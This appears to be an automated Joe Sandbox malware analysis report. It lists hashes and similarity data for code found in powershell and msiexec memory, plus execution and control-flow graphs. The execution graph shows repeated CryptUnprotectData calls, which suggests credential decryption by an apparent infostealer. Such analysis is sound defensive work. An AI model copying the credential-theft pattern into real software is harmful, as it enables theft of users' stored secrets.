                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q
                                                                              • API String ID: 0-3865595929
                                                                              • Opcode ID: a2146dbb1f1237cf26e7cd0b92812795476e237f16174669306b8e504ee36726
                                                                              • Instruction ID: e91635033488f42c9fc41c42c35b29726493e0e03f63d485b054e18d7a8778bd
                                                                              • Opcode Fuzzy Hash: a2146dbb1f1237cf26e7cd0b92812795476e237f16174669306b8e504ee36726
                                                                              • Instruction Fuzzy Hash: BFA137B27043068FDB248F69D800B66BBF2AFC6714F24846AF465CF361DA39D845C761
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1871719670.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7a30000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: XRcq$XRcq$XRcq$tP^q$tP^q$$^q
                                                                              • API String ID: 0-1682816917
                                                                              • Opcode ID: 33fc6decea2b6dde426a7e49613ce48e979c9f67e2b024528daed88feb7643dd
                                                                              • Instruction ID: ea4cb74ffbfdd89066392be77716ac27054b428f2e02ef94ae436a38bbbe42ba
                                                                              • Opcode Fuzzy Hash: 33fc6decea2b6dde426a7e49613ce48e979c9f67e2b024528daed88feb7643dd
                                                                              • Instruction Fuzzy Hash: C96116B1F1020A9FCB149F688550A6ABBF2AFC9710F24C46AF8259F395CB31DD45CB91
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1871719670.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7a30000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'^q$d%dq$d%dq$d%dq$tP^q$$^q
                                                                              • API String ID: 0-2098638132
                                                                              • Opcode ID: 5a29db83162a21e30324799fd3a6529e51edfc2410c0f03bf4bdf8558424631c
                                                                              • Instruction ID: c8315015b9fb850d249be2308fee859f51413dcb371ae0bf048b4b4f0834d083
                                                                              • Opcode Fuzzy Hash: 5a29db83162a21e30324799fd3a6529e51edfc2410c0f03bf4bdf8558424631c
                                                                              • Instruction Fuzzy Hash: 6151D3F0A08346DFDB24CF14C550B6ABBF2AF85751F188465F8259B291CB31DD45CB91
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1875215771.0000000009450000.00000040.00000800.00020000.00000000.sdmp, Offset: 09450000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_9450000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: tP^q$tP^q$$^q$$^q$$^q
                                                                              • API String ID: 0-578306960
                                                                              • Opcode ID: 6a07197c1feba2561c5e68a0b5acf4ca3337cb654565080deb104ba113d3ea0c
                                                                              • Instruction ID: aa3a9850225c201b8832485f98667df3fcda72d24fb6104f0b119625cdb6851a
                                                                              • Opcode Fuzzy Hash: 6a07197c1feba2561c5e68a0b5acf4ca3337cb654565080deb104ba113d3ea0c
                                                                              • Instruction Fuzzy Hash: D9D1D731B002089FCB15DFA8C85076BBBA2EF84750F14885BED269B356DB72DC46C7A1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1871719670.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7a30000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                                              • API String ID: 0-3272787073
                                                                              • Opcode ID: 71f17ef6058ac2a8cf34f83a05a6c8fdb95cb523451b7c73c1bb251b4321cfc2
                                                                              • Instruction ID: 951bb0ffda8e8c3d02a03ddc89751eac1e143d20b41c761c455c8f4a91402bb3
                                                                              • Opcode Fuzzy Hash: 71f17ef6058ac2a8cf34f83a05a6c8fdb95cb523451b7c73c1bb251b4321cfc2
                                                                              • Instruction Fuzzy Hash: 3041F6B0B0430ADFDB159F2488107AF7BB3AFC5210F14846AE855CB255DF76C946CBA2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1871719670.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7a30000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                                              • API String ID: 0-3272787073
                                                                              • Opcode ID: b4a51d6ccaf430603a9242e22fb076fd0487d4149f6e6bc8c6c7e6244146a7fa
                                                                              • Instruction ID: a98b1651b97328516d4de2d39fec96bec1ff1e0c770150f87ca81d81ca2b5ac1
                                                                              • Opcode Fuzzy Hash: b4a51d6ccaf430603a9242e22fb076fd0487d4149f6e6bc8c6c7e6244146a7fa
                                                                              • Instruction Fuzzy Hash: 6C4117B1F0830ACFCB258F69880066ABBF5BFC5211F24C5BAE476C7245DA31C945C761
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1871719670.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7a30000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'^q$tP^q$$^q$$^q$$^q
                                                                              • API String ID: 0-3997570045
                                                                              • Opcode ID: c2ef7ad9180e5dbed21f5de0df68db4c857efc0abd3df8c6f6143925fb2bd9ae
                                                                              • Instruction ID: 2ef951b1559a34fc58dc061855bde062987c2758c2d68e9e4536803284127032
                                                                              • Opcode Fuzzy Hash: c2ef7ad9180e5dbed21f5de0df68db4c857efc0abd3df8c6f6143925fb2bd9ae
                                                                              • Instruction Fuzzy Hash: E131C2B2E10226DBDB248F05CA45BA5B7F2AB85720F14C16AF8B55B250C731DC84CB91
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1871719670.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7a30000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'^q$d%dq$d%dq$d%dq$tP^q
                                                                              • API String ID: 0-3846404929
                                                                              • Opcode ID: 399a3d5880a3da79f0c2c5d421fb661f54b80152e147060a17296f89e0e4207d
                                                                              • Instruction ID: 31439e24b857fca53ac62b0981d94763fda968e46055440d538d04089c8739f4
                                                                              • Opcode Fuzzy Hash: 399a3d5880a3da79f0c2c5d421fb661f54b80152e147060a17296f89e0e4207d
                                                                              • Instruction Fuzzy Hash: 18315CB1E04259DFCB28DF58C444A6ABBF2AB88711F248559F825AB354CA31DD42CB91
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1875215771.0000000009450000.00000040.00000800.00020000.00000000.sdmp, Offset: 09450000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_9450000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: tP^q$$^q$$^q$$^q$$^q
                                                                              • API String ID: 0-324510305
                                                                              • Opcode ID: 1a440fef7c2fc6f00094ffcdb41baf143716d937ffde1bfdfb0529a5a35bb653
                                                                              • Instruction ID: e4356908e1c05b22ed72f5de4f5a4cfc8e4be5daa72c4e5e68728455a4ee11d2
                                                                              • Opcode Fuzzy Hash: 1a440fef7c2fc6f00094ffcdb41baf143716d937ffde1bfdfb0529a5a35bb653
                                                                              • Instruction Fuzzy Hash: 3F21A13AA00219DFCB248ED5C984A6AB7E5AF40B59B14406BED0E9F353CB32D944C771
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1871719670.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7a30000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: (o^q$(o^q$(o^q$(o^q
                                                                              • API String ID: 0-1978863864
                                                                              • Opcode ID: 34ae27910ac4cfb8c9f53cf2e0bb812310c7970ffbed80b9c8d4a0d40caf4bcb
                                                                              • Instruction ID: 8bf55148a3d95e3ba184a1daa37f69dea9cb3dab33f7cbe1b85bbfe722f0a3ef
                                                                              • Opcode Fuzzy Hash: 34ae27910ac4cfb8c9f53cf2e0bb812310c7970ffbed80b9c8d4a0d40caf4bcb
                                                                              • Instruction Fuzzy Hash: 7DF137B170C30ADFDB158F68D840BAA7BA2AFC6310F14846AF5258F391CB36D945CB61
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1871719670.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7a30000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'^q$4'^q$4'^q$4'^q
                                                                              • API String ID: 0-1420252700
                                                                              • Opcode ID: 44b061b00005f39563e8a3bd8ab18f8ad23725f1634d52ae59944f87dcb8a81b
                                                                              • Instruction ID: 8f0ee359c8a422937dd8857a21108a0cedce20b1085346a74c3dd1eb184cf796
                                                                              • Opcode Fuzzy Hash: 44b061b00005f39563e8a3bd8ab18f8ad23725f1634d52ae59944f87dcb8a81b
                                                                              • Instruction Fuzzy Hash: 5D123BB4A003199FCB14DF54CD81B9ABBB2FB89304F1085A9D5096F795CB72AD85CFA0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1875215771.0000000009450000.00000040.00000800.00020000.00000000.sdmp, Offset: 09450000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_9450000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: tP^q$tP^q$tP^q$tP^q
                                                                              • API String ID: 0-91886675
                                                                              • Opcode ID: 9040f40f92b8799c8ba327837488185bc0415bdbab7ba2fa0036dfd65094f711
                                                                              • Instruction ID: d86c9da0bac4ce6d224172003a5150bc4e491dee223ba5c67eacff730c332cb8
                                                                              • Opcode Fuzzy Hash: 9040f40f92b8799c8ba327837488185bc0415bdbab7ba2fa0036dfd65094f711
                                                                              • Instruction Fuzzy Hash: FDC1A375A00209DFCB18DF98D54496BBBE2BB88390F14885AFD169B351DB32DC46CBE1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1871719670.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7a30000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $^q$$^q$$^q$$^q
                                                                              • API String ID: 0-2125118731
                                                                              • Opcode ID: 8c1e84347cd08a0304443ccfd0cf02231b52bd2fd1f08e0be69e48c72fd926e4
                                                                              • Instruction ID: 9585c2e27b08773effc238f3f9bdad5bc9e9bb0bbbb249b9c612b519e4f88851
                                                                              • Opcode Fuzzy Hash: 8c1e84347cd08a0304443ccfd0cf02231b52bd2fd1f08e0be69e48c72fd926e4
                                                                              • Instruction Fuzzy Hash: 38214DB170030A5FDB345E6A5C44B27B6EA9FC4719F24882AF45ACF385CDB6E845C361
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1871719670.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7a30000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $^q$$^q$$^q$$^q
                                                                              • API String ID: 0-2125118731
                                                                              • Opcode ID: 88fc557598d81123da5e1b7935b111f55795660601b1aef4d596754a758b2010
                                                                              • Instruction ID: ee70f95fe6ab755a2dd976c01dd01f5bb8b1dcb79378cfd7a52197ce19ccb60f
                                                                              • Opcode Fuzzy Hash: 88fc557598d81123da5e1b7935b111f55795660601b1aef4d596754a758b2010
                                                                              • Instruction Fuzzy Hash: 182124B5A0433BCFCB208F658444676BBF4AF82650F28C26BF8A48B241D7358484C7A1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1871719670.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7a30000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'^q$4'^q$$^q$$^q
                                                                              • API String ID: 0-2049395529
                                                                              • Opcode ID: 226221dc62049a10260b216a2b87e9304bcd21b8e42cdb9d8c9ed16ba70c73e2
                                                                              • Instruction ID: 9ce5337626ad95a6158c60ddd9bbfc97501d7bc334bb031997d72fa3050f22b4
                                                                              • Opcode Fuzzy Hash: 226221dc62049a10260b216a2b87e9304bcd21b8e42cdb9d8c9ed16ba70c73e2
                                                                              • Instruction Fuzzy Hash: 9E01D471B0E38A8FC72F5B2818601566FF36BC251071944ABD051CF75ACE288C49C3A3

                                                                              Execution Graph

                                                                              Execution Coverage:7.8%
                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                              Signature Coverage:9.1%
                                                                              Total number of Nodes:33
                                                                              Total number of Limit Nodes:2
                                                                              execution_graph 17078 1fe018 17079 1fe024 17078->17079 17083 22837b77 17079->17083 17087 22837b78 17079->17087 17080 1fe1d4 17085 22837b78 17083->17085 17084 22838029 17084->17080 17085->17084 17091 22838431 17085->17091 17089 22837b9a 17087->17089 17088 22838029 17088->17080 17089->17088 17090 22838431 CryptUnprotectData 17089->17090 17090->17089 17092 22838440 17091->17092 17096 22838a59 17092->17096 17104 22838a68 17092->17104 17093 228384b0 17093->17085 17097 22838a8d 17096->17097 17098 22838b41 17096->17098 17097->17098 17102 22838a59 CryptUnprotectData 17097->17102 17103 22838a68 CryptUnprotectData 17097->17103 17112 22838c4a 17097->17112 17116 228387a8 17098->17116 17102->17098 17103->17098 17105 22838a8d 17104->17105 17106 22838b41 17104->17106 17105->17106 17109 22838c4a CryptUnprotectData 17105->17109 17110 22838a59 CryptUnprotectData 17105->17110 17111 22838a68 CryptUnprotectData 17105->17111 17107 228387a8 CryptUnprotectData 17106->17107 17108 22838d0d 17107->17108 17108->17093 17109->17106 17110->17106 17111->17106 17113 22838c5d 17112->17113 17114 228387a8 CryptUnprotectData 17113->17114 17115 22838d0d 17114->17115 17115->17098 17117 22838ef8 CryptUnprotectData 17116->17117 17118 22838d0d 17117->17118 17118->17093

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 389 1fc146-1fc158 390 1fc15a-1fc172 389->390 391 1fc184 389->391 395 1fc17b-1fc17e 390->395 396 1fc174-1fc179 390->396 392 1fc186-1fc18a 391->392 397 1fc18b-1fc199 395->397 398 1fc180-1fc182 395->398 396->392 400 1fc19b-1fc19d 397->400 401 1fc1a2-1fc1a3 397->401 398->390 398->391 402 1fc19f-1fc1a1 400->402 403 1fc1a6-1fc1a9 400->403 401->403 402->401 404 1fc1aa-1fc1c8 402->404 403->404 405 1fc1cf-1fc2ac call 1f41a0 call 1f3cc0 404->405 406 1fc1ca 404->406 416 1fc2ae 405->416 417 1fc2b3-1fc2d4 call 1f5658 405->417 406->405 416->417 419 1fc2d9-1fc2e4 417->419 420 1fc2eb-1fc2ef 419->420 421 1fc2e6 419->421 422 1fc2f4-1fc2fb 420->422 423 1fc2f1-1fc2f2 420->423 421->420 425 1fc2fd 422->425 426 1fc302-1fc310 422->426 424 1fc313-1fc357 423->424 430 1fc3bd-1fc3d4 424->430 425->426 426->424 432 1fc359-1fc36f 430->432 433 1fc3d6-1fc3fb 430->433 437 1fc399 432->437 438 1fc371-1fc37d 432->438 442 1fc3fd-1fc412 433->442 443 1fc413 433->443 441 1fc39f-1fc3bc 437->441 439 1fc37f-1fc385 438->439 440 1fc387-1fc38d 438->440 444 1fc397 439->444 440->444 441->430 442->443 444->441
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.4115422220.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1f0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                              • API String ID: 0-1487592376
                                                                              • Opcode ID: 7853cc5f0433d7f4dd1a28df9adec9af7108a0ac89bb5912a71dbd2ca2fb243e
                                                                              • Instruction ID: f40761cb666405ab64117bf92acfdf42e1a83dc37e4bef2a8fd8272aef8aa2ce
                                                                              • Opcode Fuzzy Hash: 7853cc5f0433d7f4dd1a28df9adec9af7108a0ac89bb5912a71dbd2ca2fb243e
                                                                              • Instruction Fuzzy Hash: CAA1E574E0421CCFDB14DFAAD984AADBBF2BF89300F148069E509AB361DB319981DF50

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 448 1f5362-1f5364 449 1f5366-1f53a0 448->449 450 1f53c4-1f5484 call 1f41a0 call 1f3cc0 448->450 451 1f53a7-1f53c2 449->451 452 1f53a2 449->452 462 1f548b-1f54a9 450->462 463 1f5486 450->463 451->450 452->451 493 1f54ac call 1f5649 462->493 494 1f54ac call 1f5658 462->494 463->462 464 1f54b2-1f54bd 465 1f54bf 464->465 466 1f54c4-1f54c8 464->466 465->466 467 1f54cd-1f54d4 466->467 468 1f54ca-1f54cb 466->468 470 1f54db-1f54e9 467->470 471 1f54d6 467->471 469 1f54ec-1f5530 468->469 475 1f5596-1f55ad 469->475 470->469 471->470 477 1f55af-1f55d4 475->477 478 1f5532-1f5548 475->478 484 1f55ec 477->484 485 1f55d6-1f55eb 477->485 482 1f554a-1f5556 478->482 483 1f5572 478->483 486 1f5558-1f555e 482->486 487 1f5560-1f5566 482->487 488 1f5578-1f5595 483->488 485->484 489 1f5570 486->489 487->489 488->475 489->488 493->464 494->464
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.4115422220.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1f0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                              • API String ID: 0-1487592376
                                                                              • Opcode ID: 9dc0dd136752d52dc66f2c34e6437b770feffb331c1e28ef06f9ad3662717afb
                                                                              • Instruction ID: 636a5a08cc18988a1d0a23a058342aa48b106ce6afb48919d2d6738dabaa8020
                                                                              • Opcode Fuzzy Hash: 9dc0dd136752d52dc66f2c34e6437b770feffb331c1e28ef06f9ad3662717afb
                                                                              • Instruction Fuzzy Hash: 0391F674E00618CFDB14DFAAD884A9DBBF2BF89300F14C06AE509AB365DB349985CF50

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 495 1fc468-1fc498 496 1fc49f-1fc57c call 1f41a0 call 1f3cc0 495->496 497 1fc49a 495->497 507 1fc57e 496->507 508 1fc583-1fc5a4 call 1f5658 496->508 497->496 507->508 510 1fc5a9-1fc5b4 508->510 511 1fc5bb-1fc5bf 510->511 512 1fc5b6 510->512 513 1fc5c4-1fc5cb 511->513 514 1fc5c1-1fc5c2 511->514 512->511 516 1fc5cd 513->516 517 1fc5d2-1fc5e0 513->517 515 1fc5e3-1fc627 514->515 521 1fc68d-1fc6a4 515->521 516->517 517->515 523 1fc629-1fc63f 521->523 524 1fc6a6-1fc6cb 521->524 528 1fc669 523->528 529 1fc641-1fc64d 523->529 530 1fc6cd-1fc6e2 524->530 531 1fc6e3 524->531 534 1fc66f-1fc68c 528->534 532 1fc64f-1fc655 529->532 533 1fc657-1fc65d 529->533 530->531 535 1fc667 532->535 533->535 534->521 535->534
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.4115422220.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1f0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                              • API String ID: 0-1487592376
                                                                              • Opcode ID: 6756b3de902fcce58be6d802381e27b7ff7e0b29799fd23bc95abf63d819402f
                                                                              • Instruction ID: ebfeb44e579b3c8a0873f86a60236b607237d13779a0b4c57d7d8019f5f9586c
                                                                              • Opcode Fuzzy Hash: 6756b3de902fcce58be6d802381e27b7ff7e0b29799fd23bc95abf63d819402f
                                                                              • Instruction Fuzzy Hash: BD81C274E04218CFDB14DFAAD984AADBBF2BF88310F149069E518AB365DB309981DF50

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 539 1fccd8-1fcd08 540 1fcd0f-1fcdec call 1f41a0 call 1f3cc0 539->540 541 1fcd0a 539->541 551 1fcdee 540->551 552 1fcdf3-1fce14 call 1f5658 540->552 541->540 551->552 554 1fce19-1fce24 552->554 555 1fce2b-1fce2f 554->555 556 1fce26 554->556 557 1fce34-1fce3b 555->557 558 1fce31-1fce32 555->558 556->555 560 1fce3d 557->560 561 1fce42-1fce50 557->561 559 1fce53-1fce97 558->559 565 1fcefd-1fcf14 559->565 560->561 561->559 567 1fce99-1fceaf 565->567 568 1fcf16-1fcf3b 565->568 572 1fced9 567->572 573 1fceb1-1fcebd 567->573 574 1fcf3d-1fcf52 568->574 575 1fcf53 568->575 578 1fcedf-1fcefc 572->578 576 1fcebf-1fcec5 573->576 577 1fcec7-1fcecd 573->577 574->575 579 1fced7 576->579 577->579 578->565 579->578
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.4115422220.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1f0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                              • API String ID: 0-1487592376
                                                                              • Opcode ID: 90f479c4f3384c3fdce3c56047b60ee4051ced6219dc9c53cbeb7ef8c43c1925
                                                                              • Instruction ID: e393764fa0a0013e186be7b34b52dacd4a3e957ef2ff1f1be3c085e5322a0dc3
                                                                              • Opcode Fuzzy Hash: 90f479c4f3384c3fdce3c56047b60ee4051ced6219dc9c53cbeb7ef8c43c1925
                                                                              • Instruction Fuzzy Hash: 8681D274E0121CCFDB14DFAAD994AADBBF2BF88300F14C069E519AB265DB309981DF50

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 583 1fd278-1fd2a8 584 1fd2af-1fd38c call 1f41a0 call 1f3cc0 583->584 585 1fd2aa 583->585 595 1fd38e 584->595 596 1fd393-1fd3b4 call 1f5658 584->596 585->584 595->596 598 1fd3b9-1fd3c4 596->598 599 1fd3cb-1fd3cf 598->599 600 1fd3c6 598->600 601 1fd3d4-1fd3db 599->601 602 1fd3d1-1fd3d2 599->602 600->599 604 1fd3dd 601->604 605 1fd3e2-1fd3f0 601->605 603 1fd3f3-1fd437 602->603 609 1fd49d-1fd4b4 603->609 604->605 605->603 611 1fd439-1fd44f 609->611 612 1fd4b6-1fd4db 609->612 616 1fd479 611->616 617 1fd451-1fd45d 611->617 619 1fd4dd-1fd4f2 612->619 620 1fd4f3 612->620 618 1fd47f-1fd49c 616->618 621 1fd45f-1fd465 617->621 622 1fd467-1fd46d 617->622 618->609 619->620 623 1fd477 621->623 622->623 623->618
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.4115422220.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1f0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                              • API String ID: 0-1487592376
                                                                              • Opcode ID: 98bba571238d04f30b505920740f99c539c1efb5c92bbbbe0aae86d5773781de
                                                                              • Instruction ID: a9ee575d198286d694be3ee3ce30eacea681a346b6e1edc31291049704da84ce
                                                                              • Opcode Fuzzy Hash: 98bba571238d04f30b505920740f99c539c1efb5c92bbbbe0aae86d5773781de
                                                                              • Instruction Fuzzy Hash: 0881B774E01218CFDB14DFAAD994AADBBF2BF88300F14C069E519AB365DB349985CF50

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 627 1fc738-1fc768 628 1fc76f-1fc84c call 1f41a0 call 1f3cc0 627->628 629 1fc76a 627->629 639 1fc84e 628->639 640 1fc853-1fc874 call 1f5658 628->640 629->628 639->640 642 1fc879-1fc884 640->642 643 1fc88b-1fc88f 642->643 644 1fc886 642->644 645 1fc894-1fc89b 643->645 646 1fc891-1fc892 643->646 644->643 647 1fc89d 645->647 648 1fc8a2-1fc8b0 645->648 649 1fc8b3-1fc8f7 646->649 647->648 648->649 653 1fc95d-1fc974 649->653 655 1fc8f9-1fc90f 653->655 656 1fc976-1fc99b 653->656 660 1fc939 655->660 661 1fc911-1fc91d 655->661 663 1fc99d-1fc9b2 656->663 664 1fc9b3 656->664 662 1fc93f-1fc95c 660->662 665 1fc91f-1fc925 661->665 666 1fc927-1fc92d 661->666 662->653 663->664 667 1fc937 665->667 666->667 667->662
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.4115422220.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1f0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                              • API String ID: 0-1487592376
                                                                              • Opcode ID: 692b3cd8267be6355aee6671073d078cfd79d5fde949e9de603e853ff795b7cf
                                                                              • Instruction ID: 384acde6a871efd5c78dd061c6946da7d900d395cdb75a0a0215e3cf6a9b743c
                                                                              • Opcode Fuzzy Hash: 692b3cd8267be6355aee6671073d078cfd79d5fde949e9de603e853ff795b7cf
                                                                              • Instruction Fuzzy Hash: 8E81A274E01218DFDB14DFAAD984AADBBF2BF88300F14C069E518AB365DB749981DF50

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 671 1fca08-1fca38 672 1fca3f-1fcb1c call 1f41a0 call 1f3cc0 671->672 673 1fca3a 671->673 683 1fcb1e 672->683 684 1fcb23-1fcb44 call 1f5658 672->684 673->672 683->684 686 1fcb49-1fcb54 684->686 687 1fcb5b-1fcb5f 686->687 688 1fcb56 686->688 689 1fcb64-1fcb6b 687->689 690 1fcb61-1fcb62 687->690 688->687 692 1fcb6d 689->692 693 1fcb72-1fcb80 689->693 691 1fcb83-1fcbc7 690->691 697 1fcc2d-1fcc44 691->697 692->693 693->691 699 1fcbc9-1fcbdf 697->699 700 1fcc46-1fcc6b 697->700 704 1fcc09 699->704 705 1fcbe1-1fcbed 699->705 706 1fcc6d-1fcc82 700->706 707 1fcc83 700->707 710 1fcc0f-1fcc2c 704->710 708 1fcbef-1fcbf5 705->708 709 1fcbf7-1fcbfd 705->709 706->707 711 1fcc07 708->711 709->711 710->697 711->710
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.4115422220.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1f0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                              • API String ID: 0-1487592376
                                                                              • Opcode ID: cd819a2dfc93f656d0f948db43f0953b86d57319389bbedd17eb941b224820fd
                                                                              • Instruction ID: d81ffa2ae748645822f644548338c50fbfb3e670571f268208be9bc17a39d2f1
                                                                              • Opcode Fuzzy Hash: cd819a2dfc93f656d0f948db43f0953b86d57319389bbedd17eb941b224820fd
                                                                              • Instruction Fuzzy Hash: 3581B274E0121CCFDB14DFAAD984AADBBF2BF88300F14C069E519AB265DB359981DF50

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
